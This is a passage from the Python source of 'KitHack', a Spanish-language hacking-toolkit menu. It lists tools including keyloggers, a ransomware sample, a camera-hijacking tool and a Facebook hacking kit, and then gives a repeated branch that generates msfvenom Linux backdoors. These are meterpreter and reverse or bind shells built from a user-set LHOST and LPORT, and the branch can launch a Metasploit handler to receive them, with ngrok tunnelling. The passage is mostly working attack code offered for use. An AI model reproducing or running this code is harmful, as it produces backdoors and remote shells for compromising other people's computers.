print ('{0}14){1} KnockMail {2}Verifica si existe un correo electronico'.format(WHITE, YELLOW, DEFAULT))
print ('{0}15){1} RkHunter {2}Herramienta de Unix que detecta los rootkits, puertas traseras y exploits locales.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}16){1} HeraKeylogger {2}Chrome Keylogger Extension.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}17){1} ZLogger {2}Keylogger remoto persistente para Windows y Linux.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}18){1} Xerosploit {2}Kit de herramientas de pruebas de penetración.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}19){1} Slacksec {2}Kit basico de herramientas hacking.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}20){1} Katana-Framework {2}Unifica distintas herramientas funcionales para pruebas de penetración.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}21){1} Z0172CK-Tools {2}Hacking Tools Z0172CK.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}22){1} Cam-Hack {2}Método avanzado para piratear la cámara de un móvil o una PC con un enlace.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}23){1} Onex {2}Biblioteca de herramientas para hackers.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}24){1} Ransom0 {2}Ransomware diseñado para buscar y cifrar datos de usuarios.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}25){1} Morpheus {2}Suite de Man-In-The-Middle que permite a los usuarios manipular tcp/udp.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}26){1} FBTOOL {2}Kit de herramientas hacking de facebook'.format(WHITE, YELLOW, DEFAULT))
print ('{0}27){1} Venom {2}Generador/compilador/controlador de shellcode (metasploit).'.format(WHITE, YELLOW, DEFAULT))
print ('{0} 0){1} Back'.format(WHITE, YELLOW))
tool = input("{0}KitHack >> {1}".format(RED, DEFAULT))
tool = tool.zfill(2)
if tool == '00':
os.system('clear')
main()
elif tool == '01':
kitools.TheFatRat()
elif tool == '02':
kitools.Msfpc()
elif tool == '03':
kitools.Fcrackzip()
elif tool == '04':
kitools.QRLjacker()
elif tool == '05':
kitools.Lazy()
elif tool == '06':
kitools.HTBINVITE()
elif tool == '07':
kitools.Ngrok()
elif tool == '08':
kitools.Bluepot()
elif tool == '09':
kitools.Setoolkit()
elif tool == '10':
kitools.A2sv()
elif tool == '11':
kitools.Fornonimizer()
elif tool == '12':
kitools.Easysploit()
elif tool == '13':
kitools.NXcrypt()
elif tool == '14':
kitools.KnockMail()
elif tool == '15':
kitools.RkHunter()
elif tool == '16':
kitools.HeraKeylogger()
elif tool == '17':
kitools.ZLogger()
elif tool == '18':
kitools.Xerosploit()
elif tool == '19':
kitools.Slacksec()
elif tool == '20':
kitools.Katana()
elif tool == '21':
kitools.Z0172CKTools()
elif tool == '22':
kitools.CamHack()
elif tool == '23':
kitools.Onex()
elif tool == '24':
kitools.Ransom0()
elif tool == '25':
kitools.Morpheus()
elif tool == '26':
kitools.FBTOOL()
elif tool == '27':
kitools.Venom()
else:
print("\n{}[X] OPCION INVALIDA".format(RED))
time.sleep(1.5)
os.system('clear')
main()
elif option == '10':
# sys msfvenom
os.system('clear')
print(msf_banner)
print ('\n{0} [*] {1}Sys Payloads:\n'.format(DEFAULT, GREEN))
print ('{0}[01] {1}LINUX {0}--> {2}Kithack.elf'.format(WHITE, YELLOW, RED))
print ('{0}[02] {1}WINDOWS {0}--> {2}Kithack.exe'.format(WHITE, YELLOW, RED))
print ('{0}[03] {1}ANDROID {0}--> {2}Kithack.apk'.format(WHITE, YELLOW, RED))
print ('{0}[04] {1}MAC OS {0}--> {2}Kithack.macho'.format(WHITE, YELLOW, RED))
print ('{0}[05] {1}PHP {0}--> {2}Kithack.php'.format(WHITE, YELLOW, RED))
print ('{0}[06] {1}PYTHON {0}--> {2}Kithack.py'.format(WHITE, YELLOW, RED))
print ('{0}[07] {1}BASH {0}--> {2}Kithack.sh'.format(WHITE, YELLOW, RED))
print ('{0}[08] {1}PERL {0}--> {2}Kithack.pl'.format(WHITE, YELLOW, RED))
print ('{0}[09] {1}RUN MSFCONSOLE {0}'.format(WHITE, YELLOW))
print ('{0} [0] {1}Back'.format(WHITE, YELLOW))
sys = input("{0}KitHack >> {1}".format(RED, DEFAULT))
sys = sys.zfill(2)
if sys == '00':
os.system('clear')
main()
elif sys == '01':
print ('{0}\n[*] {1}Select Payload:\n'.format(DEFAULT, GREEN))
print ('{0}[01]{1} linux/x64/meterpreter_reverse_http'.format(WHITE, YELLOW))
print ('{0}[02]{1} linux/x64/meterpreter_reverse_https'.format(WHITE, YELLOW))
print ('{0}[03]{1} linux/x64/meterpreter_reverse_tcp'.format(WHITE, YELLOW))
print ('{0}[04]{1} linux/x64/meterpreter/reverse_tcp'.format(WHITE, YELLOW))
print ('{0}[05]{1} linux/x64/shell_bind_tcp'.format(WHITE, YELLOW))
print ('{0}[06]{1} linux/x64/shell_reverse_tcp'.format(WHITE, YELLOW))
print ('{0}[07]{1} linux/x86/meterpreter_reverse_http'.format(WHITE, YELLOW))
print ('{0}[08]{1} linux/x86/meterpreter_reverse_https'.format(WHITE, YELLOW))
print ('{0}[09]{1} linux/x86/meterpreter_reverse_tcp'.format(WHITE, YELLOW))
print ('{0}[10]{1} linux/x86/meterpreter/reverse_tcp'.format(WHITE, YELLOW))
print ('{0}[11]{1} linux/x86/shell_bind_tcp'.format(WHITE, YELLOW))
print ('{0}[12]{1} linux/x86/shell_reverse_tcp'.format(WHITE, YELLOW))
pay = input("{0}KitHack >> {1}".format(RED, DEFAULT))
pay = pay.zfill(2)
if pay == '01':
run_network()
LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT))
LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT))
OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT))
mainout = os.path.splitext(OUT)[0]
print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT))
time.sleep(4)
os.system('systemctl start postgresql && msfvenom -p linux/x64/meterpreter_reverse_http LHOST={0} LPORT={1} -f elf > output/{2}.elf'.format(LHOST, LPORT, mainout))
location = os.getcwd()
if os.stat('output/{}.elf'.format(mainout)).st_size != 0:
print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf".format(GREEN, DEFAULT, location, mainout))
if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y":
os.system('systemctl stop postgresql && clear')
main()
else:
if not ".tcp.ngrok.io" in LHOST:
os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x64/meterpreter_reverse_http; exploit\'"'.format(LHOST, LPORT))
pause("\n{}Presione cualquier tecla para continuar...".format(GREEN))
os.system('systemctl stop postgresql && clear')
main()
else:
os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD linux/x64/meterpreter_reverse_http; exploit\'"')
pause("\n{}Presione cualquier tecla para continuar...".format(GREEN))
os.system('systemctl stop postgresql && clear')
main()
else:
print("{}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED))
time.sleep(3)
pause("{}Presione cualquier tecla para continuar...".format(GREEN))
os.system('systemctl stop postgresql && clear')
main()
elif pay == '02':
run_network()
LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT))
LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT))
OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT))
mainout = os.path.splitext(OUT)[0]
print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT))
time.sleep(4)
os.system('systemctl start postgresql && msfvenom -p linux/x64/meterpreter_reverse_https LHOST={0} LPORT={1} -f elf > output/{2}.elf'.format(LHOST, LPORT, mainout))
location = os.getcwd()
if os.stat('output/{}.elf'.format(mainout)).st_size != 0:
print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf".format(GREEN, DEFAULT, location, mainout))
if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y":
os.system('systemctl stop postgresql && clear')
main()
else:
if not ".tcp.ngrok.io" in LHOST:
os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x64/meterpreter_reverse_https; exploit\'"'.format(LHOST, LPORT))
pause("\n{}Presione cualquier tecla para continuar...".format(GREEN))
os.system('systemctl stop postgresql && clear')
main()
else:
os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD linux/x64/meterpreter_reverse_https; exploit\'"')
pause("\n{}Presione cualquier tecla para continuar...".format(GREEN))
os.system('systemctl stop postgresql && clear')
main()
else:
print("{}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED))
time.sleep(3)
pause("{}Presione cualquier tecla para continuar...".format(GREEN))
os.system('systemctl stop postgresql && clear')
main()
elif pay == '03':
run_network()
LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT))
LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT))
OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT))
mainout = os.path.splitext(OUT)[0]
print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT))
time.sleep(4)
os.system('systemctl start postgresql && msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST={0} LPORT={1} -f elf > output/{2}.elf'.format(LHOST, LPORT, mainout))
location = os.getcwd()
if os.stat('output/{}.elf'.format(mainout)).st_size != 0:
print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf".format(GREEN, DEFAULT, location, mainout))
if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y":
os.system('systemctl stop postgresql && clear')
main()
else:
if not ".tcp.ngrok.io" in LHOST:
os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x64/meterpreter_reverse_tcp; exploit\'"'.format(LHOST, LPORT))
pause("\n{}Presione cualquier tecla para continuar...".format(GREEN))
os.system('systemctl stop postgresql && clear')
main()
else:
os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD linux/x64/meterpreter_reverse_tcp; exploit\'"')
pause("\n{}Presione cualquier tecla para continuar...".format(GREEN))
os.system('systemctl stop postgresql && clear')
main()
else:
print("{}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED))
time.sleep(3)
pause("{}Presione cualquier tecla para continuar...".format(GREEN))
os.system('systemctl stop postgresql && clear')
main()
elif pay == '04':
run_network()
LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT))
LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT))
OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT))
mainout = os.path.splitext(OUT)[0]
print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT))
time.sleep(4)
os.system('systemctl start postgresql && msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST={0} LPORT={1} -f elf > output/{2}.elf'.format(LHOST, LPORT, mainout))
location = os.getcwd()
if os.stat('output/{}.elf'.format(mainout)).st_size != 0:
print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf".format(GREEN, DEFAULT, location, mainout))
if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y":
os.system('systemctl stop postgresql && clear')
main()
else:
if not ".tcp.ngrok.io" in LHOST:
os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x64/meterpreter/reverse_tcp; exploit\'"'.format(LHOST, LPORT))
pause("\n{}Presione cualquier tecla para continuar...".format(GREEN))
os.system('systemctl stop postgresql && clear')
main()
else:
os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD linux/x64/meterpreter/reverse_tcp; exploit\'"')
pause("\n{}Presione cualquier tecla para continuar...".format(GREEN))
os.system('systemctl stop postgresql && clear')
main()
else:
print("{}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED))
time.sleep(3)
pause("{}Presione cualquier tecla para continuar...".format(GREEN))
os.system('systemctl stop postgresql && clear')
main()
elif pay == '05':
run_network()
LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT))
LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT))
OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT))
mainout = os.path.splitext(OUT)[0]
print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT))
time.sleep(4)
os.system('systemctl start postgresql && msfvenom -p linux/x64/shell_bind_tcp LHOST={0} LPORT={1} -f elf > output/{2}.elf'.format(LHOST, LPORT, mainout))
location = os.getcwd()
if os.stat('output/{}.elf'.format(mainout)).st_size != 0:
print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf".format(GREEN, DEFAULT, location, mainout))
if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y":
os.system('systemctl stop postgresql && clear')
main()
else:
if not ".tcp.ngrok.io" in LHOST:
os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x64/shell_bind_tcp; exploit\'"'.format(LHOST, LPORT))
pause("\n{}Presione cualquier tecla para continuar...".format(GREEN))
os.system('systemctl stop postgresql && clear')
main()
else:
os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD linux/x64/shell_bind_tcp; exploit\'"')
pause("\n{}Presione cualquier tecla para continuar...".format(GREEN))
os.system('systemctl stop postgresql && clear')
main()
else:
print("{}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED))
time.sleep(3)
pause("{}Presione cualquier tecla para continuar...".format(GREEN))
os.system('systemctl stop postgresql && clear')
main()
elif pay == '06':
run_network()
LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT))
LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT))
OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT))
mainout = os.path.splitext(OUT)[0]
print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT))
time.sleep(4)
os.system('systemctl start postgresql && msfvenom -p linux/x64/shell_reverse_tcp LHOST={0} LPORT={1} -f elf > output/{2}.elf'.format(LHOST, LPORT, mainout))
location = os.getcwd()
if os.stat('output/{}.elf'.format(mainout)).st_size != 0:
print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf".format(GREEN, DEFAULT, location, mainout))
if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y":
os.system('systemctl stop postgresql && clear')
main()
else:
if not ".tcp.ngrok.io" in LHOST:
os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x64/shell_reverse_tcp; exploit\'"'.format(LHOST, LPORT))
pause("\n{}Presione cualquier tecla para continuar...".format(GREEN))
os.system('systemctl stop postgresql && clear')
main()
else:
os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD linux/x64/shell_reverse_tcp; exploit\'"')
pause("\n{}Presione cualquier tecla para continuar...".format(GREEN))